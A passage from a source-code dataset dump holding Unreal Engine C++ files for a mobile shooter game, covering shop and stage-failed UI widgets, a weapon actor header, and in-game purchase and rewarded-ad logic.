nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_WeaponShop);\n\tSetADRemainTime(nRemainTime);\n\tSetBtnEnableAD((nRemainTime <= 0));\n}\n\nvoid UPG_UserWidgetScreenShop::Init()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tTArray<const FPGWeaponTableData*> kWeaponTableDatas;\n\tABCHECK(pGameInstance->GetAllWeaponTableData(kWeaponTableDatas));\n\n\tint nSlotIndex = 0;\n\tint nWeaponIndex = 0;\n\tfor (auto WeaponTableData : kWeaponTableDatas)\n\t{\n\t\tif (nSlotIndex >= m_pkWB_ShopWeaponSlot.Num())\n\t\t\tbreak;\n\n\t\tif (false == WeaponTableData->ServiceOpen)\n\t\t{\n\t\t\tnWeaponIndex++;\n\t\t\tcontinue;\n\t\t}\n\n\t\tif (m_pkWB_ShopWeaponSlot[nSlotIndex])\n\t\t{\n\t\t\tm_pkWB_ShopWeaponSlot[nSlotIndex]->SetWeaponIndex(pGameModeMainLobby, nWeaponIndex, nSlotIndex);\n\t\t}\n\n\t\tnSlotIndex++;\n\t\tnWeaponIndex++;\n\t}\n\n\tUpdateRewardPoint();\n\tUpdateLethalShopLayout();\n\tUpdateWeaponShopLayout();\n}\n\nvoid UPG_UserWidgetScreenShop::UpdateLethalShopLayout()\n{\n\tint nLethalIndex = 0;\n\tfor (auto ShopSkillSlot : m_pkWB_SkillSlot)\n\t{\n\t\tif (ShopSkillSlot)\n\t\t{\n\t\t\t// 현재 스킬은 한개만 구현되어 있으므로 임시로 첫번째 스킬 슬롯만 보여주게 한다.\n\t\t\tShopSkillSlot->SetEnable((0 == nLethalIndex));\n\t\t}\n\n\t\tnLethalIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::UpdateWeaponShopLayout()\n{\n\tfor (auto ShopWeaponSlot : m_pkWB_ShopWeaponSlot)\n\t{\n\t\tShopWeaponSlot->UpdateLayout();\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::SetBtnEnableAD(bool bEnable)\n{\n\tif (m_pkBtnADView->bIsEnabled != bEnable)\n\t\tm_pkBtnADView->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkTextADRemainTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkTextADRemainTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetScreenShop::SetADRemainTime(int32 nTime)\n{\n\tm_pkTextADRemainTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetScreenShop::ShowMessageBox(FString kTitle, FString kDescription)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetScreenShop::OnBtnGotoLobby()\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance);\n\n\tif (nullptr == m_pWBMainLobby)\n\t{\n\t\tm_pWBMainLobby = CreateWidget<UPG_UserWidgetMainLobby_Renewal>(this, WB_MainLobbyClass);\n\t\tABCHECK(nullptr != m_pWBMainLobby);\n\t}\n\n\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\tm_pWBMainLobby->AddToViewport();\n\tm_pWBMainLobby->UpdateLayoutStage();\n\tm_pWBMainLobby->UpdateLayoutMission();\n\tm_pWBMainLobby->UpdateLayoutWeaponSlot();\n\tm_pWBMainLobby->UpdateRewardPoint();\n}\n\nvoid UPG_UserWidgetScreenShop::OnBtnADView()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n}\n\nvoid UPG_UserWidgetScreenShop::OnADRewardVideoSucessed()\n{\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint32 nRewardPoint = pGameMode->GetSavePlayerData()->m_nRewardPoint + PG_ADVIEW_SHOP_REWARD;\n\tpGameMode->GetSavePlayerData()->m_nRewardPoint = nRewardPoint;\n\tpGameMode->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\tpMyPlayerState->SetRewardPoint(nRewardPoint);\n\n\tUpdateWeaponShopLayout();\n\tUpdateRewardPoint();\n\tShowMessageBox(TEXT(\"Get Reward Point!\"), TEXT(\"+200 Point\"));\n}\n\nvoid UPG_UserWidgetScreenShop::OnADRewardVideoError()\n{\n\tUpdateRewardPoint();\n\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Failed to get the reward.\\nPlease try again later.\"));\n}\n\nvoid UPG_UserWidgetScreenShop::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7890778183937073, "alphanum_fraction": 0.7897318601608276, "avg_line_length": 29.898990631103516, "blob_id": "bec301fb9f7f1b3292456290be03164eb5c27061", "content_id": "c5bba6b9f4bb973480da6c996f9172f9020d4c0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3060, "license_type": "no_license", "max_line_length": 159, "num_lines": 99, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenStageFailed.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenStageFailed.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetScreenStageFailed::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Popup Title\n\tPG_WIDGET_LINK(UTextBlock, TextTitle);\n\n\t// Mission State\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\n\t// Menu Button\n\tPG_WIDGET_LINK(UButton, BtnHome);\n\tPG_WIDGET_LINK(UButton, BtnRetry);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nbool UPG_UserWidgetScreenStageFailed::IsAbleViewStagePlayAD()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::UpdateLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tint32 nSelectedStageID = pGameModeStage->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tSetPopupTitle(cpStageData->StageName);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tm_pkBtnFlag->SetIsEnabled(bIsClearAmount);\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tm_pkBtnTime->SetIsEnabled(bIsClearTime);\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tm_pkBtnLethal->SetIsEnabled(bIsClearLethal);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::SetPopupTitle(FString kTitle)\n{\n\tABCHECK(nullptr != m_pkTextTitle);\n\tm_pkTextTitle->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnBtnHome()\n{\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnADPlayStageVideoClosed()\n{\n\n}" }, { "alpha_fraction": 0.760421633720398, "alphanum_fraction": 0.7642549276351929, "avg_line_length": 29.691177368164062, "blob_id": "21baafaea3712d2f83ca581a8e516d8c033272bb", "content_id": "498fa8722b8daa812f48017d36348d510ef77ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2257, "license_type": "no_license", "max_line_length": 111, "num_lines": 68, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_Weapon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_Weapon.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Weapon : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_Weapon();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnConstruction(const FTransform& Transform) override;\n\tvirtual void Destroyed() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\npublic :\n\tbool SetWeaponData(int32 nWeaponTableIndex);\n\n\tvirtual int32\t\t\t\tGetAttackRange();\n\tclass UAnimMontage*\t\t\tGetMontageFireReaction();\n\tconst struct FPGWeaponData* GetWeaponData();\n\tint32\t\t\t\t\t\tGetWeaponAttackDamage();\t// 현재 캐릭터 무기 레벨 상태에 따른 무기 데미지를 반환한다.\n\n\tbool IsOwnerMonster();\t// 몬스터 소유여부\n\tbool IsOwnerMyPlayer();\t// 플레이어 소유여부\n\n\t// 발사 처리\n\tUFUNCTION()\n\tvirtual void Fire();\n\n\tUFUNCTION()\n\tvirtual void StopFire();\n\nprotected :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 WeaponTableIndex;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGWeaponData WeaponData;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UStaticMeshComponent* Weapon;\n\n\t// 발사체가 생성될 때 해당 위치에 생성되는 이펙트(발사 총구 이펙트).\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UParticleSystemComponent*\tFiringEffect;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UAudioComponent* FireSound;\n\n\t// 무기 발사시 사용되는 애니메이션\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UAnimMontage* MontageFireReaction;\n};\n" }, { "alpha_fraction": 0.7623931765556335, "alphanum_fraction": 0.7649979591369629, "avg_line_length": 32.115901947021484, "blob_id": "05c935c40062e3411b26521888ee3b45ed141059", "content_id": "0fe464d71a016d315ae27c5fcd113e3e8f13e0ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 12351, "license_type": "no_license", "max_line_length": 217, "num_lines": 371, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShopWeaponSlot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetShopWeaponSlot.h\"\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n#include <Components/CanvasPanel.h>\n\nvoid UPG_UserWidgetShopWeaponSlot::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Weapon\n\tPG_WIDGET_LINK(UButton, BtnWeapon);\n\tPG_WIDGET_LINK(UImage, ImgWeaponLock);\n\tPG_WIDGET_LINK(UTextBlock, TextWeaponPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasWeaponPrice);\n\n\t// Power\n\tPG_WIDGET_LINK(UButton, BtnPower);\n\tPG_WIDGET_LINK(UTextBlock, TextPowerLevel);\n\tPG_WIDGET_LINK(UTextBlock, TextPowerPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasPowerPrice);\n\n\t// Ammo\n\tPG_WIDGET_LINK(UButton, BtnAmmo);\n\tPG_WIDGET_LINK(UTextBlock, TextAmmoLevel);\n\tPG_WIDGET_LINK(UTextBlock, TextAmmoPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasAmmoPrice);\n\n\n\t{\n\t\tm_pUserWidgetBuyPopup = CreateWidget<UPG_UserWidgetBuyPopup>(GetWorld(), LoadClass<UPG_UserWidgetBuyPopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_BuyPopup.WB_BuyPopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetBuyPopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnBuyOK);\n\t\tm_pUserWidgetBuyPopup->OnOnBtnClickedCancel.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnBuyCancel);\n\t\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetBuyPopup->AddToViewport(999);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::UpdateLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tABCHECK(nullptr != m_pGameMode);\n\n\tauto pPlayerSaveData = m_pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\tSetUnlockLayout(false);\n\t\treturn;\n\t}\n\n\t// 무기 판매 가능한지 검사\n\tif (false == pWeaponShopData->ServiceOpen)\n\t{\n\t\tSetUnlockLayout(false);\n\t\treturn;\n\t}\n\n\t// 무기 이미지 설정\n\tm_pkBtnWeapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetDisabled(pWeaponShopData->WeaponImage);\n\n\tm_bIsMaxPower = m_pGameMode->IsMaxLevelPower(m_nWeaponIndex);\n\tm_bIsMaxAmmo = m_pGameMode->IsMaxLevelAmmo(m_nWeaponIndex);\n\tm_bIsAbleBuyWepaon = !m_pGameMode->IsUnlockWeapon(m_nWeaponIndex);\n\tm_bIsAbleBuyPower = m_pGameMode->IsAbleBuyRewardPointPower(m_nWeaponIndex);\n\tm_bIsAbleBuyAmmo = m_pGameMode->IsAbleBuyRewardPointAmmo(m_nWeaponIndex);\n\n\t// 무기 데이터 설정\n\tauto pWeaponOwnData = pPlayerSaveData->WeaponOwnData.Find(m_nWeaponIndex);\n\tif (pWeaponOwnData)\n\t{\n\t\tSetWepaon(pWeaponShopData->CostUnlock);\n\t\tSetPowerLevel(pWeaponOwnData->PowerLevel, pWeaponShopData->CostUpgradePower);\n\t\tSetAmmoLevel(pWeaponOwnData->MagLevel, pWeaponShopData->CostUpgradeAmmo);\n\t\tSetUnlockLayout(pWeaponOwnData->IsUnlock);\n\t}\n\telse\n\t{\n\t\tSetWepaon(pWeaponShopData->CostUnlock);\n\t\tSetPowerLevel(0, pWeaponShopData->CostUpgradePower);\n\t\tSetAmmoLevel(0, pWeaponShopData->CostUpgradeAmmo);\n\t\tSetUnlockLayout(false);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetUnlockLayout(bool bUnlock)\n{\n\tif (bUnlock)\n\t{\n\t\t// Weapon\n\t\t{\n\t\t\tm_pkBtnWeapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\tm_pkBtnWeapon->SetIsEnabled(false);\n\t\t\tm_pkImgWeaponLock->SetVisibility(ESlateVisibility::Hidden);\n\t\t\tm_pkCanvasWeaponPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t}\n\n\t\t// Power\n\t\t{\n\t\t\tm_pkBtnPower->SetIsEnabled(true);\n\t\t\tif (m_bIsMaxPower)\n\t\t\t{\n\t\t\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t\tm_pkCanvasPowerPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::Visible);\n\t\t\t\tm_pkCanvasPowerPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t}\n\n\t\t\tm_pkTextPowerLevel->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t}\n\t\t\n\t\t// Ammo\n\t\t{\n\t\t\tm_pkBtnAmmo->SetIsEnabled(true);\n\t\t\tif (m_bIsMaxAmmo)\n\t\t\t{\n\t\t\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t\tm_pkCanvasAmmoPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::Visible);\n\t\t\t\tm_pkCanvasAmmoPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t}\n\n\t\t\tm_pkTextAmmoLevel->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t}\n\t}\n\telse\n\t{\n\t\t// Weapon\n\t\tm_pkBtnWeapon->SetVisibility(ESlateVisibility::Visible);\n\t\tm_pkBtnWeapon->SetIsEnabled(m_bIsAbleBuyWepaon);\n\t\tm_pkImgWeaponLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkCanvasWeaponPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\n\t\t// Power\n\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtnPower->SetIsEnabled(false);\n\t\tm_pkTextPowerLevel->SetVisibility(ESlateVisibility::Hidden);\n\n\t\t// Ammo\n\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtnAmmo->SetIsEnabled(false);\n\t\tm_pkTextAmmoLevel->SetVisibility(ESlateVisibility::Hidden);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex, int32 nSlotIndex)\n{\n\tABCHECK(nullptr != m_pkBtnWeapon);\n\tABCHECK(nullptr != pGameMode);\n\n\tm_pGameMode = pGameMode;\n\tm_nWeaponIndex = nWeaponIndex;\n\tm_nSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetWepaon(int32 nPrice)\n{\n\tm_pkTextWeaponPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetPowerLevel(int32 nPowerLevel, int32 nPrice)\n{\n\tif (m_bIsMaxPower)\n\t\tm_pkTextPowerLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\telse\n\t\tm_pkTextPowerLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), nPowerLevel)));\n\n\tm_pkTextPowerPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetAmmoLevel(int32 nAmmoLevel, int32 nPrice)\n{\n\tif (m_bIsMaxAmmo)\n\t\tm_pkTextAmmoLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\telse\n\t\tm_pkTextAmmoLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), nAmmoLevel)));\n\n\tm_pkTextAmmoPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\n\nvoid UPG_UserWidgetShopWeaponSlot::ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetValue((int32)ekBuyType);\n\tm_pUserWidgetBuyPopup->SetTitle(kTitle);\n\tm_pUserWidgetBuyPopup->SetPrice(nPrice);\n\tm_pUserWidgetBuyPopup->SetDescription(kDescription);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::ShowMessageBox(FString kTitle, FString kDescription, int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetValue(nValue);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnWeapon()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Weapon, pWeaponShopData->WeaponData.Name, TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUnlock);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnPower()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Power, FString::Printf(TEXT(\"%s Power\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradePower);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnAmmo()\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Ammo, FString::Printf(TEXT(\"%s Ammo\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradeAmmo);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBuyOK(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 구매 진행\n\tbool bBuySuccesed = false;\n\tswitch ((EBuyType)nValue)\n\t{\n\tcase EBuyType::eBT_Weapon:\t\tbBuySuccesed = m_pGameMode->BuyWeapon(m_nWeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Power:\t\tbBuySuccesed = m_pGameMode->BuyPowerUp(m_nWeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Ammo:\t\tbBuySuccesed = m_pGameMode->BuyAmmoUp(m_nWeaponIndex);\t\tbreak;\n\tdefault:\t\tbreak;\n\t}\n\n\t// 구매 실패\n\tif (false == bBuySuccesed)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\t\tif (nullptr == pWeaponShopData)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), 